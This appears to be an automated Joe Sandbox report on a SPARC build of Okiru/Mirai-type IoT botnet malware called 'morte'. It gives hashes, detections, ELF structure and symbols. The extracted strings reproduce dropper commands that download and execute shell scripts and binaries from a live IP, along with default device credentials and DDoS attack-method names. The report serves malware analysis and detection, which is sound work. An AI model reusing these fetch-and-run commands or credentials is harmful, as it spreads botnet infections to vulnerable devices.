Edit tour

Linux Analysis Report
morte.spc.elf

Overview

General Information

Sample name:morte.spc.elf
Analysis ID:1648658
MD5:9a043c463b39a836e2eb3de04923d11f
SHA1:fdb35a2a39fe60755dc6320d23c61f215bbd1575
SHA256:9756e34fcb700e0afc06731e6127763a92db3de30722da2d1546035fae24c2cb
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:60
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Okiru
Contains symbols with names commonly found in malware
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1648658
Start date and time:2025-03-26 03:53:14 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:morte.spc.elf
Detection:MAL
Classification:mal60.troj.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • VT rate limit hit for: http://176.65.142.252/bins/morte.%s;
  • VT rate limit hit for: http://176.65.142.252/c.sh;
  • VT rate limit hit for: http://176.65.142.252/w.sh;
Command:/tmp/morte.spc.elf
PID:5437
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:/lib/ld-uClibc.so.0: No such file or directory
  • system is lnxubuntu20
  • morte.spc.elf (PID: 5437, Parent: 5358, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/morte.spc.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
morte.spc.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    5437.1.00007fe460011000.00007fe46001b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: morte.spc.elf PID: 5437JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: morte.spc.elfReversingLabs: Detection: 38%
        Source: morte.spc.elfString: morte/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/run/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/morte.armmorte.arm5morte.arm6morte.arm7morte.m68kmorte.mipsmorte.mpslmorte.ppcmorte.sh4morte.spcmorte.x64morte.x86soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xe
        Source: morte.spc.elfString: shell:cd /data/local/tmp/; busybox wget http://176.65.142.252/w.sh; sh w.sh; curl http://176.65.142.252/c.sh; sh c.sh; wget http://176.65.142.252/wget.sh; sh wget.sh; curl http://176.65.142.252/wget.sh; sh wget.sh; busybox wget http://176.65.142.252/wget.sh; sh wget.sh; busybox curl http://176.65.142.252/wget.sh; sh wget.sh
        Source: morte.spc.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.252/bins/morte.%s -O morte; curl -O http://176.65.142.252/bins/morte.%s; chmod +x morte; ./morte || ./morte &
        Source: morte.spc.elfString: roottoorvizxvxc3511defaultsupportftpadminshell:cd /data/local/tmp/; busybox wget http://176.65.142.252/w.sh; sh w.sh; curl http://176.65.142.252/c.sh; sh c.sh; wget http://176.65.142.252/wget.sh; sh wget.sh; curl http://176.65.142.252/wget.sh; sh wget.sh; busybox wget http://176.65.142.252/wget.sh; sh wget.sh; busybox curl http://176.65.142.252/wget.sh; sh wget.sh
        Source: morte.spc.elfString: %s%s.%dcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.142.252/bins/morte.%s -O morte; curl -O http://176.65.142.252/bins/morte.%s; chmod +x morte; ./morte || ./morte &x86_64armv7armv6armv5armv4sparc[+] Iniciando scanner em %s.0/24 como %s
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: morte.spc.elfString found in binary or memory: http://176.65.142.252/bins/morte.%s
        Source: morte.spc.elfString found in binary or memory: http://176.65.142.252/bins/morte.%s;
        Source: morte.spc.elfString found in binary or memory: http://176.65.142.252/c.sh;
        Source: morte.spc.elfString found in binary or memory: http://176.65.142.252/w.sh;
        Source: morte.spc.elfString found in binary or memory: http://176.65.142.252/wget.sh;

        System Summary

        barindex
        Source: ELF static info symbol of initial sampleName: attack_method_greeth
        Source: ELF static info symbol of initial sampleName: attack_method_greip
        Source: ELF static info symbol of initial sampleName: attack_method_std
        Source: ELF static info symbol of initial sampleName: attack_method_tcpack
        Source: ELF static info symbol of initial sampleName: attack_method_tcpstomp
        Source: ELF static info symbol of initial sampleName: attack_method_tcpsyn
        Source: ELF static info symbol of initial sampleName: attack_method_tcpxmas
        Source: ELF static info symbol of initial sampleName: attack_method_udpdns
        Source: ELF static info symbol of initial sampleName: attack_method_udpgeneric
        Source: ELF static info symbol of initial sampleName: attack_method_udpplain
        Source: Initial sampleString containing 'busybox' found: busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: busyboxxx
        Source: Initial sampleString containing 'busybox' found: busyboxx
        Source: Initial sampleString containing 'busybox' found: morte/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/run/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/morte.armmorte.arm5morte.arm6morte.arm7morte.m68kmorte.mipsmorte.mpslmorte.ppcmorte.sh4morte.spcmorte.x64morte.x86soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolma
        Source: Initial sampleString containing 'busybox' found: shell:cd /data/local/tmp/; busybox wget http://176.65.142.252/w.sh; sh w.sh; curl http://176.65.142.252/c.sh; sh c.sh; wget http://176.65.142.252/wget.sh; sh wget.sh; curl http://176.65.142.252/wget.sh; sh wget.sh; busybox wget http://176.65.142.252/wget.sh; sh wget.sh; busybox curl http://176.65.142.252/wget.sh; sh wget.sh
        Source: Initial sampleString containing 'busybox' found: roottoorvizxvxc3511defaultsupportftpadminshell:cd /data/local/tmp/; busybox wget http://176.65.142.252/w.sh; sh w.sh; curl http://176.65.142.252/c.sh; sh c.sh; wget http://176.65.142.252/wget.sh; sh wget.sh; curl http://176.65.142.252/wget.sh; sh wget.sh; busybox wget http://176.65.142.252/wget.sh; sh wget.sh; busybox curl http://176.65.142.252/wget.sh; sh wget.sh
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal60.troj.linELF@0/0@2/0
        Source: /tmp/morte.spc.elf (PID: 5437)Queries kernel information via 'uname': Jump to behavior
        Source: morte.spc.elf, 5437.1.00005606db3c2000.00005606db427000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
        Source: morte.spc.elf, 5437.1.00005606db3c2000.00005606db427000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/sparc
        Source: morte.spc.elf, 5437.1.00007ffd7dc5e000.00007ffd7dc7f000.rw-.sdmpBinary or memory string: ?x86_64/usr/bin/qemu-sparc/tmp/morte.spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/morte.spc.elf
        Source: morte.spc.elf, 5437.1.00007ffd7dc5e000.00007ffd7dc7f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: morte.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5437.1.00007fe460011000.00007fe46001b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: morte.spc.elf PID: 5437, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: morte.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5437.1.00007fe460011000.00007fe46001b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: morte.spc.elf PID: 5437, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        Path InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Application Layer Protocol
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648658 Sample: morte.spc.elf Startdate: 26/03/2025 Architecture: LINUX Score: 60 8 daisy.ubuntu.com 2->8 10 Multi AV Scanner detection for submitted file 2->10 12 Yara detected Okiru 2->12 14 Contains symbols with names commonly found in malware 2->14 6 morte.spc.elf 2->6         started        signatures3 process4

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        morte.spc.elf39%ReversingLabsLinux.Backdoor.Bushido
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.24
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://176.65.142.252/c.sh;morte.spc.elffalse
            unknown
            http://176.65.142.252/bins/morte.%s;morte.spc.elffalse
              unknown
              http://176.65.142.252/wget.sh;morte.spc.elffalse
                unknown
                http://176.65.142.252/w.sh;morte.spc.elffalse
                  unknown
                  http://176.65.142.252/bins/morte.%smorte.spc.elffalse
                    unknown
                    No contacted IP infos
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    daisy.ubuntu.commorte.arm6.elfGet hashmaliciousGafgyt, OkiruBrowse
                    • 162.213.35.24
                    morte.x86.elfGet hashmaliciousOkiruBrowse
                    • 162.213.35.24
                    boatnet.spc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.x86.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.arm.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
                    Entropy (8bit):5.95806073909347
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:morte.spc.elf
                    File size:45'928 bytes
                    MD5:9a043c463b39a836e2eb3de04923d11f
                    SHA1:fdb35a2a39fe60755dc6320d23c61f215bbd1575
                    SHA256:9756e34fcb700e0afc06731e6127763a92db3de30722da2d1546035fae24c2cb
                    SHA512:11a88759f23fdbb06ef4c88c193862f6ab4207b470bd741167c09bdabf9324254cb6f0a10c1be33f1f945fa4c07ac1fb62351d822754904baee2f5f33c925d9e
                    SSDEEP:768:/rao/lvP9pEVc6lMqGc2ryMBX9RLApqUFhf5JprKh+CVNUC0y:/raStpEVvlMqGJuMTFoJpro9VNNB
                    TLSH:522328B267B82F23D0F0AB3851765B4371987B915968CB8FBC550C8BEE01350A9677F8
                    File Content Preview:.ELF.......................,...4...p.....4. ...(...........4...4...4...................................................................`...`...............................(........................................dt.Q............................/lib/ld-uCl

                    ELF header

                    Class:ELF32
                    Data:2's complement, big endian
                    Version:1 (current)
                    Machine:Sparc
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x1142c
                    Flags:0x0
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:6
                    Section Header Offset:45168
                    Section Header Size:40
                    Number of Section Headers:19
                    Header String Table Index:18
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .interpPROGBITS0x100f40xf40x140x00x2A001
                    .hashHASH0x101080x1080x3280x40x2A304
                    .dynsymDYNSYM0x104300x4300x6700x100x2A414
                    .dynstrSTRTAB0x10aa00xaa00x42c0x00x2A001
                    .rela.dynRELA0x10ecc0xecc0x1740xc0x2A304
                    .rela.pltRELA0x110400x10400x2dc0xc0x2A3154
                    .initPROGBITS0x1131c0x131c0x1c0x00x6AX004
                    .textPROGBITS0x113380x13380x6f700x00x6AX004
                    .finiPROGBITS0x182a80x82a80x140x00x6AX004
                    .rodataPROGBITS0x182c00x82c00x1ca00x00x2A008
                    .ctorsPROGBITS0x2a0000xa0000x80x00x3WA004
                    .dtorsPROGBITS0x2a0080xa0080x80x00x3WA004
                    .dynamicDYNAMIC0x2a0140xa0140xb80x80x3WA404
                    .gotPROGBITS0x2a0cc0xa0cc0x2140x40x3WA004
                    .pltPROGBITS0x2a2e00xa2e00x3100xc0x7WAX004
                    .dataPROGBITS0x2a5f00xa5f00xa000x00x3WA004
                    .bssNOBITS0x2aff00xaff00x2380x00x3WA008
                    .shstrtabSTRTAB0x00xaff00x7e0x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    PHDR0x340x100340x100340xc00xc02.17400x5R E0x4
                    INTERP0xf40x100f40x100f40x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                    LOAD0x00x100000x100000x9f600x9f606.04940x5R E0x10000.interp .hash .dynsym .dynstr .rela.dyn .rela.plt .init .text .fini .rodata
                    LOAD0xa0000x2a0000x2a0000xff00x12284.36220x7RWE0x10000.ctors .dtors .dynamic .got .plt .data .bss
                    DYNAMIC0xa0140x2a0140x2a0140xb80xb82.14770x6RW 0x4.dynamic
                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                    TypeMetaValueTag
                    DT_NEEDEDsharedliblibpthread.so.00x1
                    DT_NEEDEDsharedliblibc.so.00x1
                    DT_INITvalue0x1131c0xc
                    DT_FINIvalue0x182a80xd
                    DT_HASHvalue0x101080x4
                    DT_STRTABvalue0x10aa00x5
                    DT_SYMTABvalue0x104300x6
                    DT_STRSZbytes10680xa
                    DT_SYMENTbytes160xb
                    DT_DEBUGvalue0x00x15
                    DT_PLTGOTvalue0x2a2e00x3
                    DT_PLTRELSZbytes7320x2
                    DT_PLTRELpltrelDT_RELA0x14
                    DT_JMPRELvalue0x110400x17
                    DT_RELAvalue0x10ecc0x7
                    DT_RELASZbytes11040x8
                    DT_RELAENTbytes120x9
                    DT_NULLvalue0x00x0
                    NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                    .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                    LOCAL_ADDR.dynsym0x2b0504OBJECT<unknown>DEFAULT19
                    _Jv_RegisterClasses.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                    __bss_start.dynsym0x2aff00NOTYPE<unknown>DEFAULTSHN_ABS
                    __ctype_b.dynsym0x04OBJECT<unknown>DEFAULTSHN_UNDEF
                    __deregister_frame_info.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                    __errno_location.dynsym0x2a5388FUNC<unknown>DEFAULTSHN_UNDEF
                    __register_frame_info.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                    __uClibc_main.dynsym0x2a4d8544FUNC<unknown>DEFAULTSHN_UNDEF
                    _edata.dynsym0x2aff00NOTYPE<unknown>DEFAULTSHN_ABS
                    _end.dynsym0x2b2280NOTYPE<unknown>DEFAULTSHN_ABS
                    _fini.dynsym0x182a88FUNC<unknown>DEFAULT9
                    _init.dynsym0x1131c8FUNC<unknown>DEFAULT7
                    _start.dynsym0x1142c56FUNC<unknown>DEFAULT8
                    adb_scan_thread.dynsym0x16bfc128FUNC<unknown>DEFAULT8
                    allowed_ports.dynsym0x2a5f832OBJECT<unknown>DEFAULT18
                    allowed_ports_size.dynsym0x2a6184OBJECT<unknown>DEFAULT18
                    atoi.dynsym0x2a55c24FUNC<unknown>DEFAULTSHN_UNDEF
                    attack_method_greeth.dynsym0x123e01656FUNC<unknown>DEFAULT8
                    attack_method_greip.dynsym0x12a581472FUNC<unknown>DEFAULT8
                    attack_method_std.dynsym0x15664588FUNC<unknown>DEFAULT8
                    attack_method_tcpack.dynsym0x149441712FUNC<unknown>DEFAULT8
                    attack_method_tcpstomp.dynsym0x141ec1880FUNC<unknown>DEFAULT8
                    attack_method_tcpsyn.dynsym0x14ff41648FUNC<unknown>DEFAULT8
                    attack_method_tcpxmas.dynsym0x13a941880FUNC<unknown>DEFAULT8
                    attack_method_udpdns.dynsym0x134041680FUNC<unknown>DEFAULT8
                    attack_method_udpgeneric.dynsym0x11ea41340FUNC<unknown>DEFAULT8
                    attack_method_udpplain.dynsym0x11c58588FUNC<unknown>DEFAULT8
                    attack_method_udpvse.dynsym0x130181004FUNC<unknown>DEFAULT8
                    bind.dynsym0x2a44836FUNC<unknown>DEFAULTSHN_UNDEF
                    calloc.dynsym0x2a424112FUNC<unknown>DEFAULTSHN_UNDEF
                    clock.dynsym0x2a58056FUNC<unknown>DEFAULTSHN_UNDEF
                    close.dynsym0x2a5bc48FUNC<unknown>DEFAULTSHN_UNDEF
                    closedir.dynsym0x2a598148FUNC<unknown>DEFAULTSHN_UNDEF
                    connect.dynsym0x2a34056FUNC<unknown>DEFAULTSHN_UNDEF
                    default_creds.dynsym0x2af9488OBJECT<unknown>DEFAULT18
                    exit.dynsym0x2a544164FUNC<unknown>DEFAULTSHN_UNDEF
                    fclose.dynsym0x2a4f0368FUNC<unknown>DEFAULTSHN_UNDEF
                    fcntl.dynsym0x2a5a480FUNC<unknown>DEFAULTSHN_UNDEF
                    fd_ctrl.dynsym0x2af844OBJECT<unknown>DEFAULT18
                    fd_serv.dynsym0x2af884OBJECT<unknown>DEFAULT18
                    fgets.dynsym0x2a394116FUNC<unknown>DEFAULTSHN_UNDEF
                    fopen.dynsym0x2a4e424FUNC<unknown>DEFAULTSHN_UNDEF
                    fork.dynsym0x2a4c0376FUNC<unknown>DEFAULTSHN_UNDEF
                    free.dynsym0x2a5c8280FUNC<unknown>DEFAULTSHN_UNDEF
                    getpid.dynsym0x2a38864FUNC<unknown>DEFAULTSHN_UNDEF
                    getppid.dynsym0x2a4fc64FUNC<unknown>DEFAULTSHN_UNDEF
                    getsockname.dynsym0x2a5e076FUNC<unknown>DEFAULTSHN_UNDEF
                    getsockopt.dynsym0x2a52c84FUNC<unknown>DEFAULTSHN_UNDEF
                    inet_addr.dynsym0x2a45440FUNC<unknown>DEFAULTSHN_UNDEF
                    inet_ntop.dynsym0x2a550700FUNC<unknown>DEFAULTSHN_UNDEF
                    inet_pton.dynsym0x2a364560FUNC<unknown>DEFAULTSHN_UNDEF
                    ioctl.dynsym0x2a31c100FUNC<unknown>DEFAULTSHN_UNDEF
                    kill.dynsym0x2a43c72FUNC<unknown>DEFAULTSHN_UNDEF
                    listen.dynsym0x2a4b428FUNC<unknown>DEFAULTSHN_UNDEF
                    local_prefix_classB.dynsym0x2b03016OBJECT<unknown>DEFAULT19
                    malloc.dynsym0x2a3ac376FUNC<unknown>DEFAULTSHN_UNDEF
                    memcpy.dynsym0x04212FUNC<unknown>DEFAULTSHN_UNDEF
                    methods.dynsym0x2b0104OBJECT<unknown>DEFAULT19
                    methods_len.dynsym0x2b00c1OBJECT<unknown>DEFAULT19
                    open.dynsym0x2a57480FUNC<unknown>DEFAULTSHN_UNDEF
                    opendir.dynsym0x2a514260FUNC<unknown>DEFAULTSHN_UNDEF
                    pending_connection.dynsym0x2b0181OBJECT<unknown>DEFAULT19
                    printf.dynsym0x2a32876FUNC<unknown>DEFAULTSHN_UNDEF
                    pthread_create.dynsym0x2a34c212FUNC<unknown>DEFAULTSHN_UNDEF
                    pthread_join.dynsym0x2a5b0548FUNC<unknown>DEFAULTSHN_UNDEF
                    read.dynsym0x2a48456FUNC<unknown>DEFAULTSHN_UNDEF
                    readdir.dynsym0x2a3e8184FUNC<unknown>DEFAULTSHN_UNDEF
                    readlink.dynsym0x2a3a076FUNC<unknown>DEFAULTSHN_UNDEF
                    realloc.dynsym0x2a4a8316FUNC<unknown>DEFAULTSHN_UNDEF
                    recv.dynsym0x2a33460FUNC<unknown>DEFAULTSHN_UNDEF
                    recvfrom.dynsym0x2a3c468FUNC<unknown>DEFAULTSHN_UNDEF
                    resolve_func.dynsym0x2af8c4OBJECT<unknown>DEFAULT18
                    restricted_substrings.dynsym0x2a7142160OBJECT<unknown>DEFAULT18
                    scan_thread.dynsym0x1722c140FUNC<unknown>DEFAULT8
                    select.dynsym0x2a3dc84FUNC<unknown>DEFAULTSHN_UNDEF
                    send.dynsym0x2a40060FUNC<unknown>DEFAULTSHN_UNDEF
                    sendto.dynsym0x2a49c68FUNC<unknown>DEFAULTSHN_UNDEF
                    setsid.dynsym0x2a58c64FUNC<unknown>DEFAULTSHN_UNDEF
                    setsockopt.dynsym0x2a46044FUNC<unknown>DEFAULTSHN_UNDEF
                    sigaddset.dynsym0x2a3f456FUNC<unknown>DEFAULTSHN_UNDEF
                    sigemptyset.dynsym0x2a35832FUNC<unknown>DEFAULTSHN_UNDEF
                    signal.dynsym0x2a478204FUNC<unknown>DEFAULTSHN_UNDEF
                    sigprocmask.dynsym0x2a5d4140FUNC<unknown>DEFAULTSHN_UNDEF
                    sleep.dynsym0x2a3b8428FUNC<unknown>DEFAULTSHN_UNDEF
                    snprintf.dynsym0x2a37048FUNC<unknown>DEFAULTSHN_UNDEF
                    socket.dynsym0x2a3d076FUNC<unknown>DEFAULTSHN_UNDEF
                    sprintf.dynsym0x2a52052FUNC<unknown>DEFAULTSHN_UNDEF
                    srv_addr.dynsym0x2b05416OBJECT<unknown>DEFAULT19
                    sscanf.dynsym0x2a4cc48FUNC<unknown>DEFAULTSHN_UNDEF
                    strcpy.dynsym0x2a310804FUNC<unknown>DEFAULTSHN_UNDEF
                    strlen.dynsym0x2a568120FUNC<unknown>DEFAULTSHN_UNDEF
                    strncpy.dynsym0x2a490248FUNC<unknown>DEFAULTSHN_UNDEF
                    strrchr.dynsym0x2a418192FUNC<unknown>DEFAULTSHN_UNDEF
                    strstr.dynsym0x2a46c288FUNC<unknown>DEFAULTSHN_UNDEF
                    table.dynsym0x2b064448OBJECT<unknown>DEFAULT19
                    table_key.dynsym0x2afec4OBJECT<unknown>DEFAULT18
                    time.dynsym0x2a50872FUNC<unknown>DEFAULTSHN_UNDEF
                    uname.dynsym0x2a40c68FUNC<unknown>DEFAULTSHN_UNDEF
                    usleep.dynsym0x2a37c72FUNC<unknown>DEFAULTSHN_UNDEF
                    watchdog_pid.dynsym0x2b0144OBJECT<unknown>DEFAULT19
                    whitelistpaths.dynsym0x2a61c248OBJECT<unknown>DEFAULT18
                    write.dynsym0x2a43056FUNC<unknown>DEFAULTSHN_UNDEF

                    Download Network PCAP: filteredfull

                    TimestampSource PortDest PortSource IPDest IP
                    Mar 26, 2025 03:56:49.260509014 CET3279153192.168.2.131.1.1.1
                    Mar 26, 2025 03:56:49.260571957 CET4445653192.168.2.131.1.1.1
                    Mar 26, 2025 03:56:49.358439922 CET53444561.1.1.1192.168.2.13
                    Mar 26, 2025 03:56:49.359936953 CET53327911.1.1.1192.168.2.13
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
